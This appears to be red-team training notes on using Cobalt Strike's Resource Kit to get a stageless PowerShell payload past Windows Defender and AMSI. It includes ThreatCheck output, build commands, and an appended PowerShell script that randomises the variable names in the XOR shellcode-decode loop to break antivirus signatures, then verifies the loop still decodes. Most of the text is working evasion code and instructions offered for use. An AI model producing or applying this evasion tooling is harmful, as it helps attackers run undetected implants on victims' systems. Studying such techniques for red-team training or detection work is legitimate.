Resource Kit
The Resource Kit can be found in C:\Tools\cobaltstrike\arsenal-kit\kits\resource. The portion of the ThreatCheck output that we want to pay attention to is the for loop, i.e. the bytes that the AMSI signature matches on:
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
The 64-bit stageless PowerShell payload is taken from template.x64.ps1. Interestingly, if we open it in Visual Studio Code, we see the following on lines 26-28:
for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
$v_code[$zz] = $v_code[$zz] -bxor 35
}
HelpSystems have already provided a template with different variable names: $zz in place of $x and $v_code in place of $var_code. Because the signature is on the bytes of that loop, the template bypasses Defender as shipped and we don't need to modify it further. As before, run the included build script with an output directory, then load resources.cna into Cobalt Strike.
./build.sh /mnt/c/Tools/cobaltstrike/resources
[Resource Kit] [+] Copy the resource files
[Resource Kit] [+] Generate the resources.cna from the template file.
[Resource Kit] [+] The resource kit files are saved in '/mnt/c/Tools/cobaltstrike/resources'
Regenerate your payloads for the final time and run ThreatCheck against the new PowerShell payload to confirm it is clean.
PS C:\Users\Attacker> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
[+] No threat found!
[*] Run time: 0.34s
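If a later Defender signature catches the shipped template, the fix is the same one HelpSystems applied: rename the identifiers in the flagged loop. The following is an added example, not code from the Resource Kit or from the course material. It renames $v_code and $zz in a constructed copy of the template's XOR loop to random identifiers, checks that the original names are gone, then executes the rewritten loop to confirm it still decodes the payload bytes. The function names, the random-identifier scheme and the sample bytes are assumptions for illustration.

```powershell
# Added example (not from the Resource Kit or the course material).
# Renames the identifiers in the template's XOR-decode loop and proves the
# rewritten loop still decodes the same bytes. Function names, the random
# identifier scheme and the sample bytes are assumptions for illustration.

# Random lowercase identifier that is a valid PowerShell variable name.
function New-RandomIdentifier {
    param([int]$Length = 10)
    $alphabet = [char[]]'abcdefghijklmnopqrstuvwxyz'
    $chars = 1..$Length | ForEach-Object { $alphabet | Get-Random }
    return (-join $chars)
}

# Replace each $old variable with $new across the template text. The pattern is
# anchored on the leading '$' and a trailing word boundary, so renaming $zz does
# not touch $zz2, and '$$' in the replacement yields a literal '$' for .NET regex.
function Rename-TemplateVariables {
    param(
        [Parameter(Mandatory)][string]$Text,
        [Parameter(Mandatory)][hashtable]$Map
    )
    foreach ($old in $Map.Keys) {
        $pattern = '\$' + [regex]::Escape($old) + '\b'
        $Text = [regex]::Replace($Text, $pattern, '$$' + $Map[$old])
    }
    return $Text
}

# Single-byte XOR; XOR is its own inverse, so this both encodes and decodes.
function ConvertTo-XorBytes {
    param([Parameter(Mandatory)][byte[]]$Bytes, [byte]$Key = 35)
    $out = [byte[]]::new($Bytes.Length)
    for ($i = 0; $i -lt $Bytes.Length; $i++) {
        $out[$i] = $Bytes[$i] -bxor $Key
    }
    return ,$out
}

# Constructed stand-in for lines 26-28 of template.x64.ps1 (the loop ThreatCheck flagged).
$loopTemplate = @'
for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
    $v_code[$zz] = $v_code[$zz] -bxor 35
}
'@

$map = @{ 'v_code' = New-RandomIdentifier; 'zz' = New-RandomIdentifier }
$renamed = Rename-TemplateVariables -Text $loopTemplate -Map $map

# Neither original identifier may survive, otherwise the flagged bytes are unchanged.
if ($renamed -match '\$(v_code|zz)\b') {
    throw 'Rename failed: original identifiers still present'
}

# Wrap the rewritten loop in a scriptblock that receives the encoded bytes through
# the new name of $v_code and returns the array after the loop decodes it in place.
$codeVar = $map['v_code']
$sb = [scriptblock]::Create("param([byte[]]`$$codeVar)`n$renamed`n,`$$codeVar")

# Constructed sample bytes standing in for shellcode; encode with key 35, decode
# with the renamed loop, and require an exact round trip.
$sample  = [byte[]](0x90, 0x90, 0x48, 0x31, 0xC0, 0xC3)
$encoded = ConvertTo-XorBytes -Bytes $sample -Key 35
$decoded = & $sb $encoded

if ([Convert]::ToBase64String($decoded) -ne [Convert]::ToBase64String($sample)) {
    throw 'Renamed loop does not decode the payload'
}
Write-Host "Renamed `$v_code -> `$$codeVar, `$zz -> `$$($map['zz']); round trip OK"
Write-Host $renamed
```

Run it in a PowerShell 5.1 or 7 session; the printed loop is what you would paste back into template.x64.ps1 before running build.sh, and the round-trip check is the reason to do the rename with anchored regexes rather than a blind string replace, which could silently corrupt other identifiers in the template.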